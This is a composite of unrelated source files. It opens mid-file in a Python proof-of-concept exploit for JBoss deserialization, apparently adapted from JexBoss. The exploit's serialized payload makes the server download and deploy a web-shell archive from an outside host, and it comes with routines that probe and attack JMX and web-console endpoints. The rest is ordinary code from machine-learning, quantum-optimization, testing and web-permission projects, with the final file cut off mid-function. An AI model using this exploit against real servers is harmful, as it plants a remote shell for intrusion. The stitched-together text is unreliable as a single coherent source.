"\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
"\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
"\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
"\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
"\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
"\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
"\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
"\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0e\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
"\x77\x73\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70\x70"
"\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x73"
"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74"
"\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf"
"\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f"
"\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexws/jexws.jsp")
def auto_exploit(self,url, exploit_type):
result = 505
if exploit_type == "jmx-console":
result = self.exploit_jmx_console_file_repository(url)
if result != 200 and result != 500:
result = self.exploit_jmx_console_main_deploy(url)
elif exploit_type == "web-console":
result = self.exploit_web_console_invoker(url)
elif exploit_type == "JMXInvokerServlet":
result = self.exploit_jmx_invoker_file_repository(url, 0)
if result != 200 and result != 500:
result = self.exploit_jmx_invoker_file_repository(url, 1)
if result == 200 or result == 500:
return True
def poc(self,url):
"""
Test if a GET to a URL is successful
:param url: The URL to test
:return: A dict with the exploit type as the keys, and the HTTP status code as the value
"""
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console": "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet"}
step1 = False
exploit_type = ''
for i in paths.keys():
try:
r = pool.request('HEAD', url + str(paths[i]), redirect=True, headers=headers, timeout=3)
paths[i] = r.status
if paths[i] == 200 or paths[i] == 500:
step1 = True
exploit_type = str(i)
else:
pass
except Exception:
paths[i] = 505
if step1:
step2 = False
try:
step2 = self.auto_exploit(url, exploit_type)
except Exception, e:
pass
return step2
else:
return False
#验证漏洞 pocsuite -r 13-JBoss-serialization-getshell.py -u 192.168.127.12:8087 --verify
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = "8087"
vul_host = _host + ":" + _port
#print vul_host
try:
vul_result = self.poc(vul_host)
except Exception, e:
vul_result = False
if vul_result:
#print u"发现漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = vul_host + "https://github.com/joaomatosf/jexboss"
#print r_content
#from bs4 import BeautifulSoup
#soup = BeautifulSoup(r_content,'html.parser')
#print soup.h1.string
print '[+]13 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
# https://github.com/joaomatosf/jexboss
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(JbossPOC)
|
python/tvm/topi/nn/dilate.py | XiaoSong9905/tvm | 4,640 | 12610792 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Dilation operators"""
import tvm
from tvm import te
from .. import utils
from .. import tag
@te.tag_scope(tag=tag.INJECTIVE + ",dilate")
def dilate(data, strides, dilation_value=0.0, name="DilatedInput"):
"""Dilate data with given dilation value (0 by default).
Parameters
----------
data : tvm.te.Tensor
n-D, can be any layout.
strides : list / tuple of n ints
Dilation stride on each dimension, 1 means no dilation.
dilation_value : int/float, optional
Value used to dilate the input.
name : str, optional
The name prefix operators generated
Returns
-------
Output : tvm.te.Tensor
n-D, the same layout as data.
"""
n = len(data.shape)
if len(strides) != n:
raise ValueError("data dimension and strides size dismatch : %d vs %d" % (n, len(strides)))
ana = tvm.arith.Analyzer()
out_shape = tuple(ana.simplify((data.shape[i] - 1) * strides[i] + 1) for i in range(n))
def _dilate(*indices):
not_zero = []
index_tuple = []
idxdiv = tvm.tir.indexdiv
idxmod = tvm.tir.indexmod
for i in range(n):
if not utils.equal_const_int(strides[i], 1):
index_tuple.append(idxdiv(indices[i], strides[i]))
not_zero.append(idxmod(indices[i], strides[i]).equal(0))
else:
index_tuple.append(indices[i])
if not_zero:
not_zero = tvm.tir.all(*not_zero)
return tvm.tir.if_then_else(
not_zero, data(*index_tuple), tvm.tir.const(dilation_value, data.dtype)
)
return data(*index_tuple)
return te.compute(out_shape, _dilate, name=name)
|
models/transformer_block.py | Hanqer/T2T-ViT | 931 | 12610804 | # Copyright (c) [2012]-[2021] Shanghai Yitu Technology Co., Ltd.
#
# This source code is licensed under the Clear BSD License
# LICENSE file in the root directory of this file
# All rights reserved.
"""
Borrow from timm(https://github.com/rwightman/pytorch-image-models)
"""
import torch
import torch.nn as nn
import numpy as np
from timm.models.layers import DropPath
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = qk_scale or head_dim ** -0.5
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
def forward(self, x):
B, N, C = x.shape
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2]
attn = (q @ k.transpose(-2, -1)) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
x = self.proj(x)
x = self.proj_drop(x)
return x
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop=0., attn_drop=0.,
drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):
super().__init__()
self.norm1 = norm_layer(dim)
self.attn = Attention(
dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x):
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
def get_sinusoid_encoding(n_position, d_hid):
''' Sinusoid position encoding table '''
def get_position_angle_vec(position):
return [position / np.power(10000, 2 * (hid_j // 2) / d_hid) for hid_j in range(d_hid)]
sinusoid_table = np.array([get_position_angle_vec(pos_i) for pos_i in range(n_position)])
sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # dim 2i
sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # dim 2i+1
return torch.FloatTensor(sinusoid_table).unsqueeze(0)
|
configs/detection/mpsr/voc/split1/mpsr_r101_fpn_2xb2_voc-split1_1shot-fine-tuning.py | BIGWangYuDong/mmfewshot | 376 | 12610807 | _base_ = [
'../../../_base_/datasets/two_branch/few_shot_voc.py',
'../../../_base_/schedules/schedule.py', '../../mpsr_r101_fpn.py',
'../../../_base_/default_runtime.py'
]
# classes splits are predefined in FewShotVOCDataset
# FewShotVOCDefaultDataset predefine ann_cfg for model reproducibility.
data = dict(
train=dict(
dataset=dict(
type='FewShotVOCDefaultDataset',
ann_cfg=[dict(method='MPSR', setting='SPLIT1_1SHOT')],
num_novel_shots=1,
num_base_shots=1,
classes='ALL_CLASSES_SPLIT1')),
val=dict(classes='ALL_CLASSES_SPLIT1'),
test=dict(classes='ALL_CLASSES_SPLIT1'))
evaluation = dict(
interval=500, class_splits=['BASE_CLASSES_SPLIT1', 'NOVEL_CLASSES_SPLIT1'])
checkpoint_config = dict(interval=2000)
optimizer = dict(
lr=0.005,
paramwise_cfg=dict(
custom_keys=dict({'.bias': dict(lr_mult=2.0, decay_mult=0.0)})))
lr_config = dict(
warmup_iters=500,
warmup_ratio=1. / 3,
step=[1300],
)
runner = dict(max_iters=2000)
# load_from = 'path of base training model'
load_from = (
'work_dirs/mpsr_r101_fpn_2xb2_voc-split1_base-training/latest.pth')
model = dict(
roi_head=dict(
bbox_roi_extractor=dict(roi_layer=dict(aligned=False)),
bbox_head=dict(init_cfg=[
dict(
type='Normal',
override=dict(type='Normal', name='fc_cls', std=0.001))
])))
|
test/algorithms/test_warm_start_qaoa.py | X-Libor/qiskit-optimization | 109 | 12610831 | <filename>test/algorithms/test_warm_start_qaoa.py
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test warm start QAOA optimizer. """
from test import QiskitOptimizationTestCase, requires_extra_library
import numpy as np
from docplex.mp.model import Model
from qiskit import BasicAer
from qiskit.algorithms import QAOA
from qiskit_optimization.algorithms import SlsqpOptimizer
from qiskit_optimization.algorithms.goemans_williamson_optimizer import (
GoemansWilliamsonOptimizer,
)
from qiskit_optimization.algorithms.warm_start_qaoa_optimizer import (
MeanAggregator,
WarmStartQAOAOptimizer,
)
from qiskit_optimization.applications.max_cut import Maxcut
from qiskit_optimization.translators import from_docplex_mp
class TestWarmStartQAOAOptimizer(QiskitOptimizationTestCase):
"""Tests for the warm start QAOA optimizer."""
@requires_extra_library
def test_max_cut(self):
"""Basic test on the max cut problem."""
graph = np.array(
[
[0.0, 1.0, 2.0, 0.0],
[1.0, 0.0, 1.0, 0.0],
[2.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 0.0],
]
)
presolver = GoemansWilliamsonOptimizer(num_cuts=10)
problem = Maxcut(graph).to_quadratic_program()
backend = BasicAer.get_backend("statevector_simulator")
qaoa = QAOA(quantum_instance=backend, reps=1)
aggregator = MeanAggregator()
optimizer = WarmStartQAOAOptimizer(
pre_solver=presolver,
relax_for_pre_solver=False,
qaoa=qaoa,
epsilon=0.25,
num_initial_solutions=10,
aggregator=aggregator,
)
result_warm = optimizer.solve(problem)
self.assertIsNotNone(result_warm)
self.assertIsNotNone(result_warm.x)
np.testing.assert_almost_equal([0, 0, 1, 0], result_warm.x, 3)
self.assertIsNotNone(result_warm.fval)
np.testing.assert_almost_equal(4, result_warm.fval, 3)
def test_constrained_binary(self):
"""Constrained binary optimization problem."""
model = Model()
v = model.binary_var(name="v")
w = model.binary_var(name="w")
# pylint:disable=invalid-name
t = model.binary_var(name="t")
model.minimize(v + w + t)
model.add_constraint(2 * v + 10 * w + t <= 3, "cons1")
model.add_constraint(v + w + t >= 2, "cons2")
problem = from_docplex_mp(model)
backend = BasicAer.get_backend("statevector_simulator")
qaoa = QAOA(quantum_instance=backend, reps=1)
aggregator = MeanAggregator()
optimizer = WarmStartQAOAOptimizer(
pre_solver=SlsqpOptimizer(),
relax_for_pre_solver=True,
qaoa=qaoa,
epsilon=0.25,
aggregator=aggregator,
)
result_warm = optimizer.solve(problem)
self.assertIsNotNone(result_warm)
self.assertIsNotNone(result_warm.x)
np.testing.assert_almost_equal([1, 0, 1], result_warm.x, 3)
self.assertIsNotNone(result_warm.fval)
np.testing.assert_almost_equal(2, result_warm.fval, 3)
def test_simple_qubo(self):
"""Test on a simple QUBO problem."""
model = Model()
# pylint:disable=invalid-name
u = model.binary_var(name="u")
v = model.binary_var(name="v")
model.minimize((u - v + 2) ** 2)
problem = from_docplex_mp(model)
backend = BasicAer.get_backend("statevector_simulator")
qaoa = QAOA(quantum_instance=backend, reps=1)
optimizer = WarmStartQAOAOptimizer(
pre_solver=SlsqpOptimizer(),
relax_for_pre_solver=True,
qaoa=qaoa,
epsilon=0.25,
)
result_warm = optimizer.solve(problem)
self.assertIsNotNone(result_warm)
self.assertIsNotNone(result_warm.x)
np.testing.assert_almost_equal([0, 1], result_warm.x, 3)
self.assertIsNotNone(result_warm.fval)
np.testing.assert_almost_equal(1, result_warm.fval, 3)
|
official/nlp/modeling/ops/segment_extractor_test.py | akshit-protonn/models | 82,518 | 12610841 | <filename>official/nlp/modeling/ops/segment_extractor_test.py
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# encoding=utf-8
"""Tests for sentence prediction labels."""
import functools
from absl.testing import parameterized
import tensorflow as tf
from official.nlp.modeling.ops import segment_extractor
class NextSentencePredictionTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters([
dict(
test_description="all random",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[[
b"Who let the dogs out?", b"Who?.", b"Who let the dogs out?"
], [b"Hello there.", b"Hello there."]],
expected_labels=[
[False, False, False],
[False, False],
],
random_threshold=0.0,
),
dict(
test_description="all next",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[
[b"La la la.", b"Such is life.", b"Who let the dogs out?"],
[b"Who?.", b"Hello there."],
],
expected_labels=[
[True, True, False],
[True, False],
],
random_threshold=1.0,
),
])
def testNextSentencePrediction(self,
sentences,
expected_segment,
expected_labels,
random_threshold=0.5,
test_description=""):
sentences = tf.ragged.constant(sentences)
# Set seed and rig the shuffle function to a deterministic reverse function
# instead. This is so that we have consistent and deterministic results.
extracted_segment, actual_labels = (
segment_extractor.get_next_sentence_labels(
sentences,
random_threshold,
random_fn=functools.partial(
tf.random.stateless_uniform, seed=(2, 3))))
self.assertAllEqual(expected_segment, extracted_segment)
self.assertAllEqual(expected_labels, actual_labels)
class SentenceOrderLabelsTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters([
dict(
test_description="all random",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[[
b"Who let the dogs out?", b"Who?.", b"Who let the dogs out?"
], [b"Hello there.", b"Hello there."]],
expected_labels=[[True, True, True], [True, True]],
random_threshold=0.0,
random_next_threshold=0.0,
),
dict(
test_description="all next",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[[
b"La la la.", b"Such is life.", b"Who let the dogs out?"
], [b"Who?.", b"Hello there."]],
expected_labels=[[True, True, True], [True, True]],
random_threshold=1.0,
random_next_threshold=0.0,
),
dict(
test_description="all preceeding",
sentences=[[b"Hello there.", b"La la la.", b"Such is life."],
[b"Who let the dogs out?", b"Who?."]],
expected_segment=[
[b"La la la.", b"Hello there.", b"Hello there."],
[b"Who?.", b"Who let the dogs out?"],
],
expected_labels=[
[True, False, False],
[True, False],
],
random_threshold=1.0,
random_next_threshold=1.0,
),
])
def testSentenceOrderPrediction(self,
sentences,
expected_segment,
expected_labels,
random_threshold=0.5,
random_next_threshold=0.5,
test_description=""):
sentences = tf.ragged.constant(sentences)
# Set seed and rig the shuffle function to a deterministic reverse function
# instead. This is so that we have consistent and deterministic results.
extracted_segment, actual_labels = (
segment_extractor.get_sentence_order_labels(
sentences,
random_threshold=random_threshold,
random_next_threshold=random_next_threshold,
random_fn=functools.partial(
tf.random.stateless_uniform, seed=(2, 3))))
self.assertAllEqual(expected_segment, extracted_segment)
self.assertAllEqual(expected_labels, actual_labels)
if __name__ == "__main__":
tf.test.main()
|
main_test.py | HTTPArchive/httparchive.org | 269 | 12610843 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from main import app, talisman
import pytest
# Create test client without https redirect
# (normally taken care of by running in debug)
@pytest.fixture
def client():
with app.test_client() as client:
talisman.force_https = False
yield client
# Add a function to test routes with optional location
def assert_route(client, path, status, location=None):
response = client.get(path)
redirect_loc = response.location
if redirect_loc:
redirect_loc = redirect_loc.replace("http://localhost", "")
if location is not None:
assert response.status_code == status and redirect_loc == location
else:
assert response.status_code == status
def test_index(client):
assert_route(client, "/", 200)
def test_reports(client):
assert_route(client, "/reports", 200)
def test_report(client):
assert_route(client, "/reports/state-of-the-web", 200)
def test_external_report(client):
assert_route(
client,
"/reports/cwv-tech",
302,
"https://datastudio.google.com/u/0/reporting/55bc8fad-44c2-4280-aa0b-5f3f0cd3d2be/page/M6ZPC",
)
|
python/interpret_text/experimental/explanation.py | imatiach-msft/interpret-text | 277 | 12610855 | <filename>python/interpret_text/experimental/explanation.py
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
"""Defines the explanations that are returned from explaining models."""
import numpy as np
import uuid
from interpret_community.common.explanation_utils import _sort_values, _order_imp
from interpret_community.common.constants import Dynamic, ExplanationParams, ExplainParams
from interpret_community.explanation.explanation import (
LocalExplanation,
ExpectedValuesMixin,
ClassesMixin,
)
class TextExplanation(LocalExplanation):
"""Defines the mixin for text explanations."""
def __init__(self, predicted_label=None, true_label=None, **kwargs):
"""Create the text explanation.
:param predicted_label: The label predicted by the classifier
:type predicted_label: string
:param true_label: The ground truth label for the sentence
:type true_label: string
"""
super(TextExplanation, self).__init__(**kwargs)
order = _order_imp(np.abs(self.local_importance_values))
self._local_importance_rank = _sort_values(self._features, order)
self._predicted_label = predicted_label
self._true_label = true_label
self._logger.debug("Initializing TextExplanation")
if len(order.shape) == 3:
i = np.arange(order.shape[0])[:, np.newaxis]
j = np.arange(order.shape[1])[:, np.newaxis]
self._ordered_local_importance_values = np.array(
self.local_importance_values
)[i, j, order]
else:
self._ordered_local_importance_values = self.local_importance_values
@property
def predicted_label(self):
"""Get the predicted label of the document from original model.
:return: The predicted label of the document.
:rtype: string
"""
return self._predicted_label
@property
def local_importance_rank(self):
"""Feature names sorted by importance.
This property exists for text explanations only and not for local because currently
we are doing text explanations for a single document and it is more difficult to
define order for multiple instances. Note this is subject to change if we eventually
add global explanations for text explainers.
:return: The feature names sorted by importance.
:rtype: list
"""
return self._local_importance_rank.tolist()
@property
def ordered_local_importance_values(self):
"""Get the feature importance values ordered by importance.
This property exists for text explanations only and not for local because currently
we are doing text explanations for a single document and it is more difficult to
define order for multiple instances. Note this is subject to change if we eventually
add global explanations for text explainers.
:return: For a model with a single output such as regression, this
returns a list of feature importance values. For models with vector outputs this function
returns a list of such lists, one for each output. The dimension of this matrix
is (# examples x # features).
:rtype: list
"""
return self._ordered_local_importance_values
@classmethod
def _does_quack(cls, explanation):
"""Validate that the explanation object passed in is a valid TextExplanation.
:param explanation: The explanation to be validated.
:type explanation: object
:return: True if valid else False
:rtype: bool
"""
if not super()._does_quack(explanation):
return False
if (
not hasattr(explanation, ExplainParams.LOCAL_IMPORTANCE_RANK)
or explanation.local_importance_rank is None
):
return False
if (
not hasattr(explanation, ExplainParams.ORDERED_LOCAL_IMPORTANCE_VALUES)
or explanation.ordered_local_importance_values is None
):
return False
return True
def _create_local_explanation(
expected_values=None,
classification=True,
text_explanation=False,
image_explanation=False,
explanation_id=None,
**kwargs
):
"""Dynamically creates an explanation based on local type and specified data.
:param expected_values: The expected values of the model.
:type expected_values: list
:param classification: Indicates if this is a classification or regression explanation.
:type classification: bool
:param text_explanation: Indicates if this is a text explanation.
:type text_explanation: bool
:param image_explanation: Indicates if this is an image explanation.
:type image_explanation: bool
:param explanation_id: If specified, puts the local explanation under a preexisting explanation object.
If not, a new unique identifier will be created for the explanation.
:type explanation_id: str
:return: A model explanation object. It is guaranteed to be a LocalExplanation. If expected_values is not None, it
will also have the properties of the ExpectedValuesMixin. If classification is set to True, it will have the
properties of the ClassesMixin. If text_explanation is set to True, it will have the properties of
TextExplanation.
:rtype: DynamicLocalExplanation
"""
exp_id = explanation_id or str(uuid.uuid4())
if text_explanation:
mixins = [TextExplanation]
else:
mixins = [LocalExplanation]
if expected_values is not None:
mixins.append(ExpectedValuesMixin)
kwargs[ExplanationParams.EXPECTED_VALUES] = expected_values
if classification:
mixins.append(ClassesMixin)
DynamicLocalExplanation = type(Dynamic.LOCAL_EXPLANATION, tuple(mixins), {})
local_explanation = DynamicLocalExplanation(explanation_id=exp_id, **kwargs)
return local_explanation
|
api/nodes/permissions.py | gaybro8777/osf.io | 628 | 12610860 | # -*- coding: utf-8 -*-
from rest_framework import permissions
from rest_framework import exceptions
from addons.base.models import BaseAddonSettings
from osf.models import (
AbstractNode,
Contributor,
DraftNode,
DraftRegistration,
Institution,
Node,
NodeRelation,
OSFGroup,
OSFUser,
Preprint,
PrivateLink,
)
from osf.utils import permissions as osf_permissions
from api.base.utils import get_user_auth, is_deprecated, assert_resource_type
class ContributorOrPublic(permissions.BasePermission):
acceptable_models = (AbstractNode, NodeRelation, Preprint, DraftRegistration)
def has_object_permission(self, request, view, obj):
from api.nodes.views import NodeStorageProvider
if isinstance(obj, BaseAddonSettings):
obj = obj.owner
if isinstance(obj, NodeStorageProvider):
obj = obj.node
if isinstance(obj, DraftNode):
obj = obj.registered_draft.first()
if isinstance(obj, dict):
obj = obj.get('self', None)
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_public or obj.can_view(auth)
else:
return obj.can_edit(auth)
class IsPublic(permissions.BasePermission):
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
return obj.is_public or obj.can_view(auth)
class IsAdminContributor(permissions.BasePermission):
"""
Use on API views where the requesting user needs to be an
admin contributor to make changes. Admin group membership
is not sufficient.
"""
acceptable_models = (AbstractNode, DraftRegistration,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.has_permission(auth.user, osf_permissions.ADMIN)
else:
return obj.is_admin_contributor(auth.user)
class EditIfPublic(permissions.BasePermission):
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
if request.method not in permissions.SAFE_METHODS:
return obj.is_public
return True
class IsAdmin(permissions.BasePermission):
acceptable_models = (AbstractNode, PrivateLink,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
if isinstance(obj, PrivateLink):
obj = view.get_node()
auth = get_user_auth(request)
return obj.has_permission(auth.user, osf_permissions.ADMIN)
class AdminDeletePermissions(permissions.BasePermission):
acceptable_models = (AbstractNode, DraftRegistration)
def has_object_permission(self, request, view, obj):
"""
Admin perms are required to delete a node
"""
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method == 'DELETE':
return obj.has_permission(auth.user, osf_permissions.ADMIN)
return True
class IsContributorOrGroupMember(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
assert isinstance(obj, AbstractNode), 'obj must be an Node, got {}'.format(obj)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_contributor_or_group_member(auth.user)
else:
return obj.has_permission(auth.user, osf_permissions.WRITE)
class AdminOrPublic(permissions.BasePermission):
acceptable_models = (AbstractNode, OSFUser, Institution, BaseAddonSettings, DraftRegistration,)
def has_object_permission(self, request, view, obj):
if isinstance(obj, dict) and 'self' in obj:
obj = obj['self']
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_public or obj.can_view(auth)
else:
return obj.has_permission(auth.user, osf_permissions.ADMIN)
class AdminContributorOrPublic(permissions.BasePermission):
acceptable_models = (AbstractNode, DraftRegistration,)
def has_object_permission(self, request, view, obj):
"""
To make changes, user must be an admin contributor. Admin group membership is not sufficient.
"""
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
if request.method in permissions.SAFE_METHODS:
return obj.is_public or obj.can_view(auth)
else:
return obj.is_admin_contributor(auth.user)
class ExcludeWithdrawals(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if isinstance(obj, Node):
node = obj
else:
context = request.parser_context['kwargs']
node = AbstractNode.load(context[view.node_lookup_url_kwarg])
if node.is_retracted:
return False
return True
class ReadOnlyIfWithdrawn(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if isinstance(obj, Node):
node = obj
else:
context = request.parser_context['kwargs']
node = AbstractNode.load(context[view.node_lookup_url_kwarg])
if node.is_retracted:
return request.method in permissions.SAFE_METHODS
return True
class ContributorDetailPermissions(permissions.BasePermission):
"""Permissions for contributor detail page."""
acceptable_models = (AbstractNode, OSFUser, Contributor,)
def load_resource(self, context, view):
return AbstractNode.load(context[view.node_lookup_url_kwarg])
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
context = request.parser_context['kwargs']
resource = self.load_resource(context, view)
user = OSFUser.load(context['user_id'])
if request.method in permissions.SAFE_METHODS:
return resource.is_public or resource.can_view(auth)
elif request.method == 'DELETE':
return resource.has_permission(auth.user, osf_permissions.ADMIN) or auth.user == user
else:
return resource.has_permission(auth.user, osf_permissions.ADMIN)
class NodeGroupDetailPermissions(permissions.BasePermission):
"""Permissions for node group detail - involving who can update the relationship
between a node and an OSF Group."""
acceptable_models = (OSFGroup, AbstractNode,)
def load_resource(self, context, view):
return AbstractNode.load(context[view.node_lookup_url_kwarg])
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
node = self.load_resource(request.parser_context['kwargs'], view)
if request.method in permissions.SAFE_METHODS:
return node.is_public or node.can_view(auth)
elif request.method == 'DELETE':
# If deleting an OSF group from a node, you either need admin perms
# or you need to be an OSF group manager
return node.has_permission(auth.user, osf_permissions.ADMIN) or obj.has_permission(auth.user, 'manage')
else:
